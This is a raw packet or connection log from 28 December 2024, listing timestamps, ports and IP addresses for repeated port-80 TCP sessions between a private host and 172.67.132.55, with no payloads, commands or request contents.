Dec 28, 2024 22:19:01.000617027 CET	80	49765	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:01.234962940 CET	49765	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:01.354681969 CET	80	49765	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:01.965178967 CET	80	49765	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:02.016175032 CET	49765	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:02.199708939 CET	80	49765	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:02.250499010 CET	49765	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:02.325265884 CET	49765	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:02.325932980 CET	49766	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:02.445163012 CET	80	49765	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:02.445422888 CET	80	49766	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:02.445481062 CET	49765	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:02.445528984 CET	49766	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:02.445694923 CET	49766	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:02.565191031 CET	80	49766	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:02.799388885 CET	49766	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:02.918953896 CET	80	49766	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:03.623440027 CET	80	49766	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:03.635651112 CET	49767	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:03.638077021 CET	49766	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:03.755470991 CET	80	49767	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:03.755558014 CET	49767	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:03.758364916 CET	80	49766	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:03.758410931 CET	49766	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:03.769473076 CET	49767	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:03.888987064 CET	80	49767	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:04.130139112 CET	49767	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:04.249763012 CET	80	49767	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:04.249880075 CET	80	49767	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:04.377981901 CET	49768	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:04.497548103 CET	80	49768	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:04.497631073 CET	49768	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:04.497790098 CET	49768	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:04.617463112 CET	80	49768	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:04.844532013 CET	49768	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:04.886641979 CET	80	49767	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:04.938014030 CET	49767	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:04.964075089 CET	80	49768	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:05.134057999 CET	80	49767	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:05.188024998 CET	49767	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:05.628463984 CET	80	49768	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:05.672410965 CET	49768	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:05.875762939 CET	80	49768	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:05.922393084 CET	49768	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:06.081286907 CET	49764	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:06.187872887 CET	49767	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:06.187937975 CET	49768	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:06.196387053 CET	49769	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:06.307719946 CET	80	49767	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:06.308162928 CET	80	49768	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:06.308244944 CET	49767	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:06.308296919 CET	49768	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:06.315947056 CET	80	49769	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:06.316010952 CET	49769	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:06.316191912 CET	49769	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:06.435672045 CET	80	49769	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:06.672892094 CET	49769	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:06.792591095 CET	80	49769	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:07.399946928 CET	80	49769	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:07.453656912 CET	49769	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:07.635663986 CET	80	49769	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:07.688029051 CET	49769	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:07.763668060 CET	49769	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:07.764435053 CET	49770	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:07.883479118 CET	80	49769	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:07.883606911 CET	49769	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:07.883903980 CET	80	49770	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:07.883991957 CET	49770	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:07.887212992 CET	49770	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:08.007019997 CET	80	49770	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:08.235209942 CET	49770	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:08.354746103 CET	80	49770	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:09.061162949 CET	80	49770	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:09.109924078 CET	49770	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:09.314224005 CET	80	49770	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:09.359891891 CET	49770	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:09.434556961 CET	49772	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:09.554058075 CET	80	49772	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:09.554127932 CET	49772	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:09.554275036 CET	49772	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:09.674019098 CET	80	49772	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:09.907098055 CET	49772	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:10.026581049 CET	80	49772	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:10.141951084 CET	49772	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:10.142384052 CET	49774	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:10.262444973 CET	80	49774	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:10.265499115 CET	49774	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:10.265620947 CET	49774	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:10.265664101 CET	49775	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:10.303786039 CET	80	49772	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:10.385255098 CET	80	49774	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:10.385446072 CET	80	49775	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:10.385525942 CET	49775	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:10.385689974 CET	49775	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:10.493443012 CET	80	49772	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:10.493490934 CET	49772	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:10.505170107 CET	80	49775	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:10.622230053 CET	49774	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:10.735045910 CET	49775	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:10.741771936 CET	80	49774	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:10.741884947 CET	80	49774	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:10.854551077 CET	80	49775	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:11.397407055 CET	80	49774	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:11.453645945 CET	49774	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:11.469860077 CET	80	49775	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:11.516194105 CET	49775	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:11.641290903 CET	80	49774	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:11.688059092 CET	49774	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:11.703802109 CET	80	49775	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:11.717571020 CET	49770	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:11.750545025 CET	49775	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:12.983073950 CET	49774	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:12.983141899 CET	49775	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:13.040308952 CET	49782	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:13.102915049 CET	80	49774	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:13.102972031 CET	49774	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:13.103339911 CET	80	49775	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:13.103389025 CET	49775	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:13.159912109 CET	80	49782	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:13.159990072 CET	49782	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:13.160377026 CET	49782	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:13.279946089 CET	80	49782	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:13.516786098 CET	49782	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:13.636441946 CET	80	49782	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:14.245529890 CET	80	49782	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:14.297434092 CET	49782	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:14.483347893 CET	80	49782	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:14.531805992 CET	49782	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:15.261445045 CET	49782	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:15.275810003 CET	49788	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:15.382282972 CET	80	49782	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:15.382338047 CET	49782	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:15.396121025 CET	80	49788	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:15.396205902 CET	49788	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:15.396370888 CET	49788	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:15.515856028 CET	80	49788	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:15.750674963 CET	49788	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:15.870353937 CET	80	49788	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:16.541701078 CET	80	49788	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:16.594311953 CET	49788	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:16.720901012 CET	49793	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:16.784989119 CET	80	49788	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:16.828692913 CET	49788	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:16.840596914 CET	80	49793	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:16.840689898 CET	49793	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:16.840837002 CET	49793	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:16.909070969 CET	49788	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:16.910008907 CET	49794	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:16.960587025 CET	80	49793	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:17.029023886 CET	80	49788	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:17.029170036 CET	49788	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:17.029580116 CET	80	49794	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:17.033557892 CET	49794	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:17.033723116 CET	49794	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:17.153358936 CET	80	49794	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:17.188321114 CET	49793	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:17.308144093 CET	80	49793	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:17.308224916 CET	80	49793	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:17.425121069 CET	49794	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:17.544724941 CET	80	49794	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:17.928141117 CET	80	49793	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:17.969377041 CET	49793	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:18.178066969 CET	80	49793	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:18.213720083 CET	80	49794	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:18.219296932 CET	49793	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:18.270412922 CET	49794	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:18.466440916 CET	80	49794	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:18.516273022 CET	49794	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:18.594296932 CET	49793	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:18.594960928 CET	49794	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:18.595367908 CET	49800	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:18.714284897 CET	80	49793	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:18.714752913 CET	80	49794	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:18.714795113 CET	80	49800	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:18.714824915 CET	49793	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:18.714847088 CET	49794	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:18.714901924 CET	49800	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:18.715071917 CET	49800	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:18.834523916 CET	80	49800	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:19.063122034 CET	49800	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:19.182777882 CET	80	49800	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:19.799546957 CET	80	49800	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:19.844316006 CET	49800	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:20.031882048 CET	80	49800	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:20.078672886 CET	49800	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:20.153572083 CET	49806	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:20.273226023 CET	80	49806	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:20.273416996 CET	49806	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:20.273605108 CET	49806	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:20.394221067 CET	80	49806	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:20.761765957 CET	49806	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:20.881942987 CET	80	49806	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:21.358395100 CET	80	49806	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:21.406826019 CET	49806	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:21.602377892 CET	80	49806	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:21.656801939 CET	49806	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:21.782396078 CET	49806	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:21.782793045 CET	49807	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:21.902247906 CET	80	49806	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:21.902312994 CET	49806	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:21.902383089 CET	80	49807	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:21.902580023 CET	49807	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:21.902772903 CET	49807	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:22.022207975 CET	80	49807	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:22.252608061 CET	49807	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:22.372181892 CET	80	49807	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:23.033169985 CET	80	49807	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:23.078795910 CET	49807	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:23.205039978 CET	49807	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:23.205909014 CET	49813	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:23.277010918 CET	80	49807	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:23.277275085 CET	49807	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:23.324472904 CET	49800	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:23.324918032 CET	80	49807	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:23.325016975 CET	49807	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:23.325031042 CET	49814	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:23.325367928 CET	80	49813	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:23.325457096 CET	49813	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:23.325540066 CET	49813	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:23.444576979 CET	80	49814	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:23.444967031 CET	80	49813	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:23.445112944 CET	49814	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:23.452454090 CET	49814	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:23.571981907 CET	80	49814	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:24.019669056 CET	49813	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:24.139223099 CET	80	49813	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:24.139394999 CET	80	49813	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:24.141710043 CET	49814	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:24.261337996 CET	80	49814	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:24.507338047 CET	80	49813	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:24.563061953 CET	49813	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:24.622615099 CET	80	49814	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:24.672442913 CET	49814	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:24.778511047 CET	80	49813	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:24.828845024 CET	49813	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:24.874237061 CET	80	49814	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:24.922426939 CET	49814	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:24.996674061 CET	49814	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:24.996675014 CET	49813	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:24.997450113 CET	49820	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:25.116775990 CET	80	49814	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:25.116863012 CET	49814	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:25.116903067 CET	80	49820	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:25.117052078 CET	49820	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:25.117079020 CET	80	49813	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:25.117249966 CET	49813	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:25.117253065 CET	49820	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:25.236712933 CET	80	49820	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:25.471524954 CET	49820	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:25.591099977 CET	80	49820	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:26.249558926 CET	80	49820	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:26.297507048 CET	49820	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:26.493418932 CET	80	49820	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:26.547430038 CET	49820	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:26.694391012 CET	80	49820	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:26.734937906 CET	49820	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:26.964442015 CET	49826	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:27.084026098 CET	80	49826	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:27.084222078 CET	49826	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:27.167586088 CET	49826	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:27.287100077 CET	80	49826	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:27.516263008 CET	49826	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:27.635797977 CET	80	49826	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:28.170129061 CET	80	49826	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:28.219873905 CET	49826	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:28.403940916 CET	80	49826	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:28.453695059 CET	49826	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:28.530675888 CET	49826	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:28.531014919 CET	49827	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:28.650527954 CET	80	49827	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:28.650580883 CET	80	49826	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:28.650738001 CET	49826	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:28.650738001 CET	49827	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:28.650840998 CET	49827	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:28.770570993 CET	80	49827	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:29.000668049 CET	49827	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:29.120266914 CET	80	49827	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:29.781492949 CET	80	49827	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:29.828695059 CET	49827	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:30.029474974 CET	80	49827	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:30.078706026 CET	49827	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:30.139297009 CET	49833	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:30.258851051 CET	80	49833	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:30.258927107 CET	49833	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:30.272202015 CET	49833	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:30.288510084 CET	49820	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:30.296578884 CET	49834	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:30.391776085 CET	80	49833	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:30.416058064 CET	80	49834	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:30.419502974 CET	49834	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:30.419658899 CET	49834	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:30.539191961 CET	80	49834	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:30.625746012 CET	49833	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:30.745465994 CET	80	49833	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:30.745479107 CET	80	49833	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:30.766366959 CET	49834	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:30.885937929 CET	80	49834	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:31.450403929 CET	80	49833	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:31.500570059 CET	49833	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:31.505253077 CET	80	49834	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:31.563076973 CET	49834	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:31.697041988 CET	80	49833	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:31.746707916 CET	80	49834	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:31.750581026 CET	49833	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:31.797559023 CET	49834	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:31.938555956 CET	80	49834	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:31.984956980 CET	49834	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:32.059202909 CET	49833	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:32.059268951 CET	49834	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:32.059716940 CET	49827	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:32.060020924 CET	49839	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:32.180191994 CET	80	49833	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:32.180425882 CET	80	49839	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:32.180496931 CET	49833	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:32.180541992 CET	49839	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:32.180634022 CET	80	49834	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:32.180707932 CET	49839	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:32.180708885 CET	80	49827	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:32.180727005 CET	49834	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:32.180753946 CET	49827	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:32.300209999 CET	80	49839	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:32.547220945 CET	49839	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:32.666848898 CET	80	49839	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:33.357230902 CET	80	49839	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:33.406835079 CET	49839	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:33.610124111 CET	80	49839	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:33.656853914 CET	49839	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:33.731204033 CET	49839	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:33.731498957 CET	49845	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:33.851198912 CET	80	49845	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:33.851253033 CET	80	49839	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:33.851293087 CET	49845	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:33.851339102 CET	49839	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:33.851469040 CET	49845	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:33.971005917 CET	80	49845	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:34.203855038 CET	49845	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:34.323566914 CET	80	49845	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:34.981944084 CET	80	49845	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:35.031871080 CET	49845	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:35.232598066 CET	80	49845	172.67.132.55	192.168.2.4
